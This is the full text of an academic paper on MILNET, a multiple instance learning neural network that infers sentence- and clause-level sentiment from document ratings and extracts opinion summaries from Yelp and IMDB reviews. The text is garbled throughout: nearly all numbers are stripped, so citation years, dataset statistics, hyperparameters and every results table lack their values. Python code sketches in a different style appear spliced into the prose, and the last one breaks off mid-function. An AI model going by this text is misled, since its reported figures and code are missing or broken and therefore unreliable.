introduction sentiment analysis has become a fundamental area of research in natural language processing thanks to the proliferation of user-generated content in the form of online reviews, blogs, internet forums, and social media. a plethora of methods have been pro- posed in the literature that attempt to distill senti- ment information from text, allowing users and ser- vice providers to make opinion-driven decisions. the success of neural networks in a variety of ap- plications (bahdanau et al., ; le and mikolov, ; socher et al., ) and the availability of large amounts of labeled data have led to an in- creased focus on sentiment classification. super- vised models are typically trained on documents (johnson and zhang, a; johnson and zhang, b; tang et al., ; yang et al., ), sen- tences (kim, ), or phrases (socher et al., ; [rating: ??] i had a very mixed experience at the stand. the burger and fries were good. the chocolate shake was divine: rich and creamy. the drive-thru was horrible. it took us at least minutes to order when there were only four cars in front of us. we complained about the wait and got a half–hearted apology. i would go back because the food is good, but my only hesitation is the wait. s um m ar y + the burger and fries were good + the chocolate shake was divine + i would go back because the food is good – the drive-thru was horrible – it took us at least minutes to order figure : an edu-based summary of a -out-of- star review with positive and negative snippets. socher et al., ) annotated with sentiment la- bels and used to predict sentiment in unseen texts. coarse-grained document-level annotations are rel- atively easy to obtain due to the widespread use of opinion grading interfaces (e.g., star ratings ac- companying reviews). in contrast, the acquisition of sentence- or phrase-level sentiment labels re- mains a laborious and expensive endeavor despite its relevance to various opinion mining applica- tions, e.g., detecting or summarizing consumer opin- ions in online product reviews. the usefulness of finer-grained sentiment analysis is illustrated in the example of figure , where snippets of opposing po- larities are extracted from a -star restaurant review. although, as a whole, the review conveys negative sentiment, aspects of the reviewer’s experience were clearly positive. this goes largely unnoticed when focusing solely on the review’s overall rating. in this work, we consider the problem of segment- level sentiment analysis from the perspective of multiple instance learning (mil; keeler, ). transactions of the association for computational linguistics, vol. , pp. – , . action editor: ani nenkova. submission batch: / ; revision batch: / ; published / . c© association for computational linguistics. distributed under a cc-by . license. instead of learning from individually labeled seg- ments, our model only requires document-level su- pervision and learns to introspectively judge the sen- timent of constituent segments. beyond showing how to utilize document collections of rated reviews to train fine-grained sentiment predictors, we also investigate the granularity of the extracted segments. previous research (tang et al., ; yang et al., ; cheng and lapata, ; nallapati et al., ) has predominantly viewed documents as se- quences of sentences. 
inspired by recent work in summarization (li et al., ) and sentiment clas- sification (bhatia et al., ), we also represent documents via rhetorical structure theory’s (mann and thompson, ) elementary discourse units (edus). although definitions for edus vary in the literature, we follow standard practice and take the elementary units of discourse to be clauses (carlson et al., ). we employ a state-of-the-art discourse parser (feng and hirst, ) to identify them. our contributions in this work are three-fold: a novel multiple instance learning neural model which utilizes document-level sentiment supervision to judge the polarity of its constituent segments; the creation of spot, a publicly available dataset which contains segment-level polarity annotations (for sentences and edus) and can be used for the eval- uation of mil-style models like ours; and the em- pirical finding (through automatic and human-based evaluation) that neural multiple instance learning is superior to more conventional neural architectures and other baselines on detecting segment sentiment and extracting informative opinions in reviews. background our work lies at the intersection of multiple research areas, including sentiment classification, opinion mining and multiple instance learning. we review related work in these areas below. sentiment classification sentiment classification is one of the most popular tasks in sentiment anal- ysis. early work focused on unsupervised meth- ods and the creation of sentiment lexicons (turney, ; hu and liu, ; wiebe et al., ; bac- cianella et al., ) based on which the overall po- our code and spot dataset are publicly available at: https://github.com/stangelid/milnet-sent larity of a text can be computed (e,g., by aggregating the sentiment scores of constituent words). more re- cently, taboada et al. ( ) introduced so-cal, a state-of-the-art method that combines a rich senti- ment lexicon with carefully defined rules over syn- tax trees to predict sentence sentiment. supervised learning techniques have subse- quently dominated the literature (pang et al., ; pang and lee, ; qu et al., ; xia and zong, ; wang and manning, ; le and mikolov, ) thanks to user-generated sentiment labels or large-scale crowd-sourcing efforts (socher et al., ). neural network models in particular have achieved state-of-the-art performance on vari- ous sentiment classification tasks due to their abil- ity to alleviate feature engineering. kim ( ) introduced a very successful cnn architecture for sentence-level classification, whereas other work (socher et al., ; socher et al., ) uses recur- sive neural networks to learn sentiment for segments of varying granularity (i.e., words, phrases, and sen- tences). we describe kim’s ( ) approach in more detail as it is also used as part of our model. let xi denote a k-dimensional word embedding of the i-th word in text segment s of length n. the segment’s input representation is the concatenation of word embeddings x , . . . , xn, resulting in word matrix x. let xi:i+j refer to the concatenation of embeddings xi, . . . , xi+j. a convolution filter w ∈ rlk, applied to a window of l words, produces a new feature ci = relu(w ◦ xi:i+l + b), where relu is the rectified linear unit non-linearity, ‘◦’ denotes the entrywise product followed by a sum over all elements and b ∈ r is a bias term. ap- plying the same filter to every possible window of word vectors in the segment, produces a feature map c = [c , c , . . . , cn−l+ ]. 
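A minimal sketch of this single-filter computation is given below; the max-over-time pooling over several filter widths, described next, then yields the fixed-size segment vector. The shapes and helper names are assumptions for illustration, not the authors' implementation.

```python
# Sketch of one convolutional filter applied to a segment's word matrix (not the authors' code).
# X has shape (n, k): n word embeddings of dimension k; the filter W spans l words (W has length l*k).
import numpy as np

def feature_map(X, W, b):
    """c_i = ReLU(W . X[i:i+l] + b) for every window of l consecutive words."""
    n, k = X.shape
    l = W.shape[0] // k                       # number of words covered by the filter
    feats = []
    for i in range(n - l + 1):
        window = X[i:i + l].reshape(-1)       # concatenation of the l word vectors
        feats.append(max(0.0, float(W @ window) + b))   # ReLU non-linearity
    return np.array(feats)                    # the feature map c = [c_1, ..., c_{n-l+1}]

def segment_vector(X, filters):
    """Max-over-time pooling of each filter's feature map gives the fixed-size segment vector."""
    return np.array([feature_map(X, W, b).max() for W, b in filters])
```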
multiple feature maps for varied window sizes are applied, resulting in a fixed-size segment representation v via max-over- time pooling. we will refer to the application of con- volution to an input word matrix x, as cnn(x). a final sentiment prediction is produced using a soft- max classifier and the model is trained via back- propagation using sentence-level sentiment labels. the availability of large-scale datasets (diao et al., ; tang et al., ) has also led to the de- velopment of document-level sentiment classifiers which exploit hierarchical neural representations. these are obtained by first building representations of sentences and aggregating those into a document feature vector (tang et al., ). yang et al. ( ) further acknowledge that words and sentences are deferentially important in different contexts. they present a model which learns to attend (bahdanau et al., ) to individual text parts when constructing document representations. we describe such an ar- chitecture in more detail as we use it as a point of comparison with our own model. given document d comprising segments (s , . . . , sm), a hierarchical network with at- tention (henceforth hiernet; based on yang et al., ) produces segment representations (v , . . . , vm) which are subsequently fed into a bidirectional gru module (bahdanau et al., ), whose resulting hidden vectors (h , . . . , hm) are used to produce attention weights (a , . . . , am) (see section . for more details on the attention mechanism). a document is represented as the weighted average of the segments’ hidden vec- tors vd = ∑ i aihi. a final sentiment prediction is obtained using a softmax classifier and the model is trained via back-propagation using document-level sentiment labels. the architecture is illustrated in figure (a). in their proposed model, yang et al. ( ) use bidirectional gru modules to represent segments as well as documents, whereas we use a more efficient cnn encoder to compose words into segment vectors (i.e., vi = cnn(xi)). note that models like hiernet do not naturally predict sentiment for individual segments; we discuss how they can be used for segment-level opinion extraction in section . . our own work draws inspiration from represen- tation learning (tang et al., ; kim, ), es- pecially the idea that not all parts of a document convey sentiment-worthy clues (yang et al., ). our model departs from previous approaches in that it provides a natural way of predicting the polar- ity of individual text segments without requiring segment-level annotations. moreover, our atten- tion mechanism directly facilitates opinion detection rather than simply aggregating sentence representa- tions into a single document vector. when applied to the yelp’ and imdb document clas- sification datasets, the use of cnns results in a relative perfor- mance decrease of < % compared yang et al’s model ( ). opinion mining a standard setting for opinion mining and summarization (lerman et al., ; carenini et al., ; ganesan et al., ; di fab- brizio et al., ; gerani et al., ) assumes a set of documents that contain opinions about some en- tity of interest (e.g., camera). the goal of the system is to generate a summary that is representative of the average opinion and speaks to its important aspects (e.g., picture quality, battery life, value). 
output summaries can be extractive (lerman et al., ) or abstractive (gerani et al., ; di fabbrizio et al., ) and the underlying systems exhibit vary- ing degrees of linguistic sophistication from identi- fying aspects (lerman et al., ) to using rst- style discourse analysis, and manually defined tem- plates (gerani et al., ; di fabbrizio et al., ). our proposed method departs from previous work in that it focuses on detecting opinions in individ- ual documents. given a review, we predict the po- larity of every segment, allowing for the extrac- tion of sentiment-heavy opinions. we explore the usefulness of edu segmentation inspired by li et al. ( ), who show that edu-based summaries align with near-extractive summaries constructed by news editors. importantly, our model is trained in a weakly-supervised fashion on large scale docu- ment classification datasets without recourse to fine- grained labels or gold-standard opinion summaries. multiple instance learning our models adopt a multiple instance learning (mil) framework. mil deals with problems where labels are associated with groups of instances or bags (documents in our case), while instance labels (segment-level polarities) are unobserved. an aggregation function is used to combine instance predictions and assign labels on the bag level. the goal is either to label bags (keeler and rumelhart, ; dietterich et al., ; maron and ratan, ) or to simultaneously infer bag and instance labels (zhou et al., ; wei et al., ; kotzias et al., ). we view segment-level senti- ment analysis as an instantiation of the latter variant. initial mil efforts for binary classification made the strong assumption that a bag is negative only if all of its instances are negative, and positive oth- erwise (dietterich et al., ; maron and ratan, ; zhang et al., ; andrews and hofmann, ; carbonetto et al., ). subsequent work re- laxed this assumption, allowing for prediction com- binations better suited to the tasks at hand. wei- dmann et al. ( ) introduced a generalized mil framework, where a combination of instance types is required to assign a bag label. zhou et al. ( ) used graph kernels to aggregate predictions, exploit- ing relations between instances in object and text categorization. xu and frank ( ) proposed a multiple-instance logistic regression classifier where instance predictions were simply averaged, assum- ing equal and independent contribution toward bag classification. more recently, kotzias et al. ( ) used sentence vectors obtained by a pre-trained hi- erarchical cnn (denil et al., ) as features un- der an unweighted average mil objective. predic- tion averaging was further extended by pappas and popescu-belis ( ; ), who used a weighted summation of predictions, an idea which we also adopt in our work. applications of mil are many and varied. mil was first explored by keeler and rumelhart ( ) for recognizing handwritten post codes, where the position and value of individual digits was unknown. mil techniques have since been applied to drug ac- tivity prediction (dietterich et al., ), image re- trieval (maron and ratan, ; zhang et al., ), object detection (zhang et al., ; carbonetto et al., ; cour et al., ), text classification (an- drews and hofmann, ), image captioning (wu et al., ), paraphrase detection (xu et al., ), and information extraction (hoffmann et al., ). when applied to sentiment analysis, mil takes advantage of supervision signals on the document level in order to train segment-level sentiment pre- dictors. 
although their work is not couched in the framework of mil, täckström and mcdonald ( ) show how sentence sentiment labels can be learned as latent variables from document-level an- notations using hidden conditional random fields. pappas and popescu-belis ( ) use a multiple in- stance regression model to assign sentiment scores to specific aspects of products. the group-instance cost function (gicf), proposed by kotzias et al. ( ), averages sentence sentiment predictions dur- ing trainng, while ensuring that similar sentences receive similar polarity labels. their work uses a pre-trained hierarchical cnn to obtain sentence em- beddings, but is not trainable end-to-end, in contrast with our proposed network. additionally, none of the aforementioned efforts explicitly evaluate opin- ion extraction quality. methodology in this section we describe how multiple instance learning can be used to address some of the draw- backs seen in previous approaches, namely the need for expert knowledge in lexicon-based sentiment analysis (taboada et al., ), expensive fine- grained annotation on the segment level (kim, ; socher et al., ) or the inability to naturally pre- dict segment sentiment (yang et al., ). . problem formulation under multiple instance learning (mil), a dataset d is a collection of labeled bags, each of which is a group of unlabeled instances. specifically, each document d is a sequence (bag) of segments (in- stances). this sequence d = (s , s , . . . , sm) is ob- tained from a document segmentation policy (see section for details). a discrete sentiment label yd ∈ [ , c] is associated with each document, where the labelset is ordered and classes and c corre- spond to maximally negative and maximally posi- tive sentiment. it is assumed that yd is an unknown function of the unobserved segment-level labels: yd = f(y , y , . . . , ym) ( ) probabilistic sentiment classifiers will produce document-level predictions ŷd by selecting the most probable class according to class distribution pd = 〈p( )d , . . . , p (c) d 〉. in a non-mil framework a classifier would learn to predict the document’s sen- timent by directly conditioning on its segments’ fea- ture representations or their aggregate: pd = f̂θ(v , v , . . . , vm) ( ) in contrast, a mil classifier will produce a class dis- tribution pi for each segment and additionally learn to combine these into a document-level prediction: pi = ĝθs(vi) , ( ) pd = f̂θd(p , p , . . . , pm) . ( ) in this work, ĝ and f̂ are defined using a single neu- ral network, described below. figure : a hierarchical network (hiernet) for document-level sentiment classification and our proposed multiple instance learning network (milnet). the models use the same attention mechanism to combine segment vectors and predictions respectively. . multiple instance learning network hierarchical neural models like hiernet have been used to predict document-level polarity by first en- coding sentences and then combining these repre- sentations into a document vector. hierarchical vec- tor composition produces powerful sentiment pre- dictors, but lacks the ability to introspectively judge the polarity of individual segments. our multiple instance learning network (hence- forth milnet) is based on the following intuitive assumptions about opinionated text. each segment conveys a degree of sentiment polarity, ranging from very negative to very positive. additionally, seg- ments have varying degrees of importance, in rela- tion to the overall opinion of the author. 
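Before the architecture itself is described, the contrast drawn in these equations can be made concrete with a small sketch. The mean-vector aggregate, the single linear scoring layer, and the uniform default weights used here are simplifying assumptions chosen for brevity, not components of the proposed model.

```python
# Schematic contrast (an illustration, not the authors' code) between a standard classifier,
# which conditions on an aggregate of segment representations, and a MIL classifier, which
# predicts a class distribution per segment and then combines those distributions.
import numpy as np

def softmax(z):
    e = np.exp(z - z.max())
    return e / e.sum()

def non_mil_predict(segment_vectors, W, b):
    """p_d = f(v_1, ..., v_m): here, simply a softmax over the mean segment vector."""
    doc_vec = np.mean(segment_vectors, axis=0)
    return softmax(W @ doc_vec + b)

def mil_predict(segment_vectors, W, b, attention_weights=None):
    """p_i = g(v_i) for each segment, then p_d = sum_i a_i * p_i (uniform a_i if none given)."""
    seg_dists = np.array([softmax(W @ v + b) for v in segment_vectors])   # shape (m, C)
    m = len(seg_dists)
    a = np.full(m, 1.0 / m) if attention_weights is None else attention_weights
    return a @ seg_dists                                                   # shape (C,)
```

The point of the MIL variant is that the per-segment distributions are produced as a by-product of the document-level prediction, which is what allows segment polarities to be read off without segment-level supervision.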
the overar- ching polarity of a text is an aggregation of segment polarities, weighted by their importance. thus, our model attempts to predict the polarity of segments and decides which parts of the document are good indicators of its overall sentiment, allowing for the detection of sentiment-heavy opinions. an illustra- tion of milnet is shown in figure (b); the model consists of three components: a cnn segment en- coder, a softmax segment classifier and an attention- based prediction weighting module. segment encoding an encoding vi = cnn(xi) is produced for each segment, using the cnn archi- tecture described in section . segment classification obtaining a separate rep- resentation vi for every segment in a document al- lows us to produce individual segment sentiment predictions pi = 〈p( )i , . . . , p (c) i 〉. this is achieved using a softmax classifier: pi = softmax(wcvi + bc) , ( ) where wc and bc are the classifier’s parameters, shared across all segments. individual distributions pi are shown in figure (b) as small bar-charts. document classification in the simplest case, document-level predictions can be produced by taking the average of segment class distributions: p (c) d = /m ∑ i p (c) i , c ∈ [ , c]. this is, however, a crude way of combining segment sentiment, as not all parts of a document convey important sentiment clues. we opt for a segment attention mechanism which rewards text units that are more likely to be good sentiment predictors. our attention mechanism is based on a bidirec- tional gru component (bahdanau et al., ) and the starters were quite bland. i didn’t enjoy most of them, but the burger was brilliant! . . . . p ro b a b il it y att: . polarity − gtd-pol. att: . − att: . − figure : polarity scores (bottom) obtained from class probability distributions for three edus (top) ex- tracted from a restaurant review. attention weights (top) are used to fine-tune the obtained polarities. inspired by yang et al. ( ). however, in con- trast to their work, where attention is used to com- bine sentence representations into a single document vector, we utilize a similar technique to aggregate individual sentiment predictions. we first use separate gru modules to produce forward and backward hidden vectors, which are then concatenated: −→ h i = −−−→ gru(vi), ( ) ←− h i = ←−−− gru(vi), ( ) hi = [ −→ h i, ←− h i], i ∈ [ , m] . ( ) the importance of each segment is measured with the aid of a vector ha, as follows: h′i = tanh(wahi + ba) , ( ) ai = exp(h′ti ha)∑ i exp(h ′t i ha) , ( ) where equation ( ) defines a one-layer mlp that produces an attention vector for the i-th segment. attention weights ai are computed as the normal- ized similarity of each h′i with ha. vector ha, which is randomly initialized and learned during training, can be thought of as a trained key, able to recognize sentiment-heavy segments. the attention mecha- nism is depicted in the dashed box of figure , with attention weights shown as shaded circles. finally, we obtain a document-level distribution over sentiment labels as the weighted sum of seg- ment distributions (see top of figure (b)): p (c) d = ∑ i aip (c) i , c ∈ [ , c] . ( ) training the model is trained end-to-end on doc- uments with user-generated sentiment labels. 
we use the negative log likelihood of the document-level prediction as an objective function: l = − ∑ d log p (yd) d ( ) polarity-based opinion extraction after training, our model can produce segment-level sentiment predictions for unseen texts in the form of class probability distributions. a direct application of our method is opinion extraction, where highly positive and negative snippets are selected from the original document, producing extractive sentiment summaries, as described below. polarity scoring in order to extract opinion sum- maries, we need to rank segments according to their sentiment polarity. we introduce a method that takes our model’s confidence in the prediction into ac- count, by reducing each segment’s class probability distribution pi to a single real-valued polarity score. to achieve this, we first define a real-valued class weight vector w = 〈w( ), . . . , w(c) |w(c) ∈ [− , ]〉 that assigns uniformly-spaced weights to the ordered labelset, such that w(c+ ) −w(c) = c− . for exam- ple, in a -class scenario, the class weight vector would be w = 〈− ,− . , , . , 〉. we compute the polarity score of a segment as the dot-product of the probability distribution pi with vector w: polarity(si) = ∑ c p (c) i w (c) ∈ [− , ] ( ) gated polarity as a way of increasing the effec- tiveness of our method, we introduce a gated exten- sion that uses the attention mechanism of our model to further differentiate between segments that carry significant sentiment cues and those that do not: gated-polarity(si) = ai ·polarity(si) , ( ) where ai is the attention weight assigned to the i-th segment. this forces the polarity scores of segments the model does not attend to closer to . an illustration of our polarity scoring function is provided in figure , where the class predic- tions (top) of three restaurant review segments are mapped to their corresponding polarity scores (bot- tom). we observe that our method produces the de- sired result; segments and convey negative senti- ment and receive negative scores, whereas the third segment is mapped to a positive score. although the same discrete class label is assigned to the first two, the second segment’s score is closer to (neutral) as its class probability mass is more evenly distributed. segmentation policies as mentioned earlier, one of the hypotheses investigated in this work regards the use of subsentential units as the basis of extrac- tion. specifically, our model was applied to sen- tences and elementary discourse units (edus), ob- tained from a rhetorical structure theory (rst) parser (feng and hirst, ). according to rst, documents are first segmented into edus corre- sponding roughly to independent clauses which are then recursively combined into larger discourse spans. this results in a tree representation of the document, where connected nodes are characterized by discourse relations. we only utilize rst’s seg- mentation, and leave the potential use of the tree structure to future work. the example in figure illustrates why edu- based segmentation might be beneficial for opinion extraction. the second and third edus correspond to the sentence: i didn’t enjoy most of them, but the burger was brilliant. taken as a whole, the sentence conveys mixed sentiment, whereas the edus clearly convey opposing sentiment. experimental setup in this section we describe the data used to assess the performance of our model. we also give details on model training and comparison systems. yelp’ imdb documents , , average #sentences . . 
average #edus . . average #words vocabulary size , , classes – – table : document-level sentiment classification datasets used to train our models. yelp’ seg imdbseg sent. edus sent. edus #segments , , , , #documents classes {– , , +} {– , , +} table : spot dataset: numbers of documents and segments with polarity annotations. . datasets our models were trained on two large-scale senti- ment classification collections. the yelp’ corpus was introduced in tang et al. ( ) and contains customer reviews of local businesses, each associ- ated with human ratings on a scale from (negative) to (positive). the imdb corpus of movie reviews was obtained from diao et al. ( ); each review is associated with user ratings ranging from to . both datasets are split into training ( %), validation ( %) and test ( %) sets. a summary of statistics for each collection is provided in table . in order to evaluate model performance on the segment level, we constructed a new dataset named spot (as a shorthand for segment polarity) by annotating documents from the yelp’ and imdb collections. specifically, we sampled reviews from each collection such that all document-level classes are represented uniformly, and the document lengths are representative of the respective corpus. docu- ments were segmented into sentences and edus, re- sulting in two segment-level datasets per collection. statistics are summarized in table . each review was presented to three amazon me- chanical turk (amt) annotators who were asked to judge the sentiment conveyed by each segment (i.e., sentence or edu) as negative, neutral, or pos- . . . . . . . . . p ro p o rt io n o f se g m e n ts yelp' - sentences yelp' - edus negative neutral positive document class . . . . . . . . . p ro p o rt io n o f se g m e n ts imdb - sentences document class imdb - edus figure : distribution of segment-level labels per document-level class on our the spot datasets. itive. we assigned labels using a majority vote or a fourth annotator in the rare cases of no agreement (< %). figure shows the distribution of segment labels for each document-level class. as expected, documents with positive labels contain a larger num- ber of positive segments compared to documents with negative labels and vice versa. neutral seg- ments are distributed in an approximately uniform manner across document classes. interestingly, the proportion of neutral edus is significantly higher compared to neutral sentences. the observation re- inforces our argument in favor of edu segmenta- tion, as it suggests that a sentence with positive or negative overall polarity may still contain neutral edus. discarding neutral edus, could therefore lead to more concise opinion extraction compared to relying on entire sentences. we further experimented on two collections intro- duced by kotzias et al. ( ) which also originate from the yelp’ and imdb datasets. each collec- tion consists of , randomly sampled sentences annotated with binary sentiment labels. . model comparison on the task of segment classification we compared milnet, our multiple instance learning network, against the following methods: majority: majority class applied to all instances. so-cal: state-of-the-art lexicon-based system that classifies segments into positive, neutral, and negative classes (taboada et al., ). seg-cnn: fully-supervised cnn segment classi- fier trained on spot’s labels (kim, ). gicf: the group-instance cost function model introduced in kotzias et al. ( ). 
this is an unweighted average prediction aggregation mil method that uses sentence features from a pre- trained convolutional neural model. hiernet: hiernet does not explicitly generate individual segment predictions. segment polarity scores are obtained by assigning the document- level prediction to every segment. we can then produce finer-grained polarity distinctions via gating, using the model’s attention weights. we further illustrate the differences between hi- ernet and milnet in figure , which includes short descriptions and simplified equations for each model. milnet naturally produces distinct seg- ment polarities, while hiernet assigns a single po- larity score to every segment. in both cases, gating is a further means of identifying neutral segments. finally, we differentiate between variants of hi- ernet and milnet according to: polarity source: controls whether we assign polar- ities via segment-specific or document-wide pre- dictions. hiernet only allows for document- wide predictions. milnet can use both. attention: we use models without gating (no sub- script), with gating (gt subscript) as well as mod- els trained with the attention mechanism disabled, falling back to simple averaging (avg subscript). . model training and evaluation we trained milnet and hiernet using adadelta (zeiler, ) for epochs. mini-batches of documents were organized based on the reviews’ segment and document lengths so the amount of padding was minimized. we used -dimensional pre-trained word vec embeddings. we tuned hyper- parameters on the validation sets of the document classification collections, resulting in the follow- ing configuration (unless otherwise noted). for the cnn segment encoder, we used window sizes of , figure : system pipelines for hiernet and milnet showing distinct phases for sentiment analysis. and words with feature maps per window size, resulting in -dimensional segment vectors. the gru hidden vector dimensions for each direction were set to and the attention vector dimension- ality to . we used l -normalization and dropout to regularize the softmax classifiers and additional dropout on the internal gru connections. real-valued polarity scores produced by the two models are mapped to discrete labels using two ap- propriate thresholds t , t ∈ [− , ], so that a seg- ment s is classified as negative if polarity(s) < t , positive if polarity(s) > t or neutral otherwise. to evaluate performance, we use macro-averaged f which is unaffected by class imbalance. we select optimal thresholds using -fold cross-validation and report mean scores across folds. the fully-supervised convolutional segment clas- sifier (seg-cnn) uses the same window size and feature map configuration as our segment encoder. seg-cnn was trained on spot using segment la- bels directly and -fold cross-validation (identical folds as in our main models). seg-cnn is not di- rectly comparable to milnet (or hiernet) due to differences in supervision type (segment vs. docu- ment labels) and training size ( k- k segment la- bels vs. ∼ k document labels). however, the the discretization of polarities is only used for evaluation purposes and is not necessary for summary extraction, where we only need a relative ranking of segments. comparison is indicative of the utility of fine-grained sentiment predictors that do not rely on expensive segment-level annotations. results we evaluated models in two ways. 
we first assessed their ability to classify segment polarity in reviews using the newly created spot dataset and, addition- ally, the sentence corpora of kotzias et al. ( ). our second suite of experiments focused on opin- ion extraction: we conducted a judgment elicita- tion study to determine whether extracts produced by milnet are useful and of higher quality com- pared to hiernet and other baselines. we were also interested to find out whether edus provide a better basis for opinion extraction than sentences. . segment classification table summarizes our results. the first block in the table reports the performance of the majority class baseline. the second block considers mod- els that do not utilize segment-level predictions, namely hiernet which assigns polarity scores to segments using its document-level predictions, as well as the variant of milnet which similarly uses document-level predictions only (equation ( )). in the third block, milnet’s segment-level predic- tions are used. each block further differentiates be- tween three levels of attention integration, as previ- method yelp’ seg imdbseg sent edu sent edu majority . † . † . † . † d oc um en t hiernetavg . † . † . † . † hiernet . † . † . † . † hiernetgt . † . . . † milnetavg . † . † . † . † milnet . † . † . † . † milnetgt . † . . † . † se gm milnetavg . † . † . † . † milnet . . . † . † milnetgt . . . . so-cal . † . † . † . seg-cnn . † . . † . † table : segment classification results (in macro- averaged f ). † indicates that the system in question is significantly different from milnetgt (approxi- mate randomization test (noreen, ), p < . ). ously described. the final block shows the perfor- mance of so-cal and the seg-cnn classifier. when considering models that use document- level supervision, milnet with gated, segment- specific polarities obtains the best classification per- formance across all four datasets. interestingly, it performs comparably to seg-cnn, the fully- supervised segment classifier, which provides addi- tional evidence that milnet can effectively iden- tify segment polarity without the need for segment- level annotations. our model also outperforms the strong so-cal baseline in all but one datasets which is remarkable given the expert knowledge and linguistic information used to develop the lat- ter. document-level polarity predictions result in lower classification performance across the board. differences between the standard hierarchical and multiple instance networks are less pronounced in this case, as milnet loses the advantage of produc- ing segment-specific sentiment predictions. models without attention perform worse in most cases. the use of gated polarities benefits all model configura- tions, indicating the method’s ability to selectively focus on segments with significant sentiment cues. we further analyzed the polarities assigned by milnet and hiernet to positive, negative, and neutral segments non-gtd gated se nt hiernet . . milnet . . non-gtd gated e d u hiernet . . milnet . . table : f scores for neutral segments (yelp’ ). method yelp imdb gicf . . gicfhn . . gicfmn . . milnet . . table : accuracy scores on the sentence classi- fication datasets intro- duced in kotzias et al. ( ). − . . . . . . . . . negative − hiernet neutral − positive − . . . . . . . . . − polarity milnet − figure : distribution of predicted polarity scores across three classes (yelp’ sentences). neutral segments. 
figure illustrates the distribu- tion of polarity scores produced by the two mod- els on the yelp’ dataset (sentence segmentation). in the case of negative and positive sentences, both models demonstrate appropriately skewed distribu- tions. however, the neutral class appears to be par- ticularly problematic for hiernet, where polarity scores are scattered across a wide range of values. in contrast, milnet is more successful at identify- ing neutral sentences, as its corresponding distribu- tion has a single mode near zero. attention gating addresses this issue by moving the polarity scores of sentiment-neutral segments towards zero. this is illustrated in table where we observe that gated variants of both models do a better job at identify- ing neutral segments. the effect is very significant for hiernet, while milnet benefits slightly and remains more effective overall. similar trends were observed in all four spot datasets. in order to examine the effect of training size, we trained multiple models using subsets of the original document collections. we trained on five random m a c ro -f yelp sentences yelp edus training size m a c ro -f imdb sentences training size imdb edus milnet hiernet seg-cnn figure : performance of hiernetgt and milnetgt for varying training sizes. subsets for each training size, ranging from doc- uments to the full training set, and tested segment classification performance on spot. the results, av- eraged across trials, are presented in figure . with the exception of the imdb edu-segmented dataset, milnet only requires a few thousand training doc- uments to outperform the supervised seg-cnn. hi- ernet follows a similar curve, but is inferior to milnet. a reason for milnet’s inferior perfor- mance on the imdb corpus (edu-split) can be low- quality edus, due to the noisy and informal style of language used in imdb reviews. finally, we compared milnet against the gicf model (kotzias et al., ) on their yelp and imdb sentence sentiment datasets. their model re- quires sentence embeddings from a pre-trained neu- ral model. we used the hierarchical cnn from their work (denil et al., ) and, additionally, pre-trained hiernet and milnet sentence em- beddings. the results in table show that milnet outperforms all variants of gifc. our models also seem to learn better sentence embeddings, as they improve gicf’s performance on both collections. gicf only handles binary labels, which makes it unsuitable for the full-scale comparisons in table . here, we binarize our training datasets and use same-sized sentence embeddings for all four models (r for yelp, r for imdb). method informativeness polarity coherence hiernetsent . . . milnetsent . . . unsure . . . hiernetedu . † . † . milnetedu . . . unsure . . . milnetsent . † . † . † milnetedu . . . unsure . . . lead . . † . random . † . † . † milnetedu . . . unsure . . . table : human evaluation results (in percentages). † indicates that the system in question is signifi- cantly different from milnet (sign-test, p < . ). . opinion extraction in our opinion extraction experiments, amt work- ers (all native english speakers) were shown an original review and a set of extractive, bullet-style summaries, produced by competing systems using a % compression rate. participants were asked to decide which summary was best according to three criteria: informativeness (which summary best cap- tures the salient points of the review?), polarity (which summary best highlights positive and neg- ative comments?) 
and coherence (which summary is more coherent and easier to read?). subjects were allowed to answer "unsure" in cases where they could not discriminate between summaries. we used all reviews from our spot dataset and collected three responses per document. we ran four judgment elicitation studies: one comparing hiernet and milnet when summarizing reviews segmented as sentences, a second one comparing the two models with edu segmentation, a third which compares edu- and sentence-based summaries produced by milnet, and a fourth where edu-based summaries from milnet were compared to a lead (the first n words from each document) and a random (random edus) baseline.

table summarizes our results, showing the proportion of participants that preferred each system. the first block in the table shows a slight preference for milnet across criteria. the second block shows a significant preference for milnet against hiernet on informativeness and polarity, whereas hiernet was more often preferred in terms of coherence, although the difference is not statistically significant. the third block compares sentence and edu summaries produced by milnet. edu summaries were perceived as significantly better in terms of informativeness and polarity, but not coherence. this is somewhat expected, as edus tend to produce more terse and telegraphic text and may seem unnatural due to segmentation errors. in the fourth block we observe that participants find milnet more informative and better at distilling polarity compared to the lead and random (edus) baselines. we should point out that the lead system is not a strawman; it has proved hard to outperform by more sophisticated methods (nenkova, ), particularly on the newswire domain.

figure : example edu- and sentence-based opinion summaries produced by hiernetgt and milnetgt. round brackets give attention weights, square brackets give non-gated polarity scores, and +/− mark extracted positive and negative opinions.
original review [rating: ????]: as with any family-run hole in the wall, service can be slow. what the staff lacked in speed, they made up for in charm. the food was good, but nothing wowed me. i had the pierogis while my friend had swedish meatballs. both dishes were tasty, as were the sides. one thing that was disappointing was that the food was a little cold (lukewarm). the restaurant itself is bright and clean. i will go back again when i feel like eating outside the box.
edu-based, extracted via hiernetgt: ( . ) [+ . ] the food was good (+); ( . ) [+ . ] but nothing wowed me (+); ( . ) [+ . ] the restaurant itself is bright and clean (+); ( . ) [+ . ] both dishes were tasty (+); ( . ) [+ . ] i will go back again (+)
edu-based, extracted via milnetgt: ( . ) [+ . ] the food was good (+); ( . ) [+ . ] the restaurant itself is bright and clean (+); ( . ) [+ . ] i will go back again (+); ( . ) [− . ] but nothing wowed me (−); ( . ) [− . ] the food was a little cold (lukewarm) (−)
sentence-based, extracted via hiernetgt: ( . ) [+ . ] both dishes were tasty, as were the sides (+); ( . ) [+ . ] the food was good, but nothing wowed me (+); ( . ) [+ . ] one thing that was disappointing was that the food was a little cold (lukewarm) (+)
sentence-based, extracted via milnetgt: ( . ) [+ . ] both dishes were tasty, as were the sides (+); ( . ) [+ . ] i will go back again when i feel like eating outside the box (+); ( . ) [− . ] the food was good, but nothing wowed me (−)
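the bullet-style extracts above can be assembled directly from per-segment attention weights and polarity scores like those shown in the figure above. the following sketch illustrates one way to do this ranking; the gating choice, word-budget handling, and function names are assumptions for illustration, not the exact extraction procedure.

```python
def extract_opinions(segments, attentions, polarities, compression=0.2, gated=True):
    """Rank segments (EDUs or sentences) by attention-gated polarity and keep
    the most sentiment-heavy ones within a rough word budget.

    attentions: one attention weight per segment
    polarities: one signed polarity score per segment (negative .. positive)
    Returns (segment, score) pairs, strongest sentiment first.
    """
    scores = [(a * p) if gated else p for a, p in zip(attentions, polarities)]
    budget = compression * sum(len(s.split()) for s in segments)
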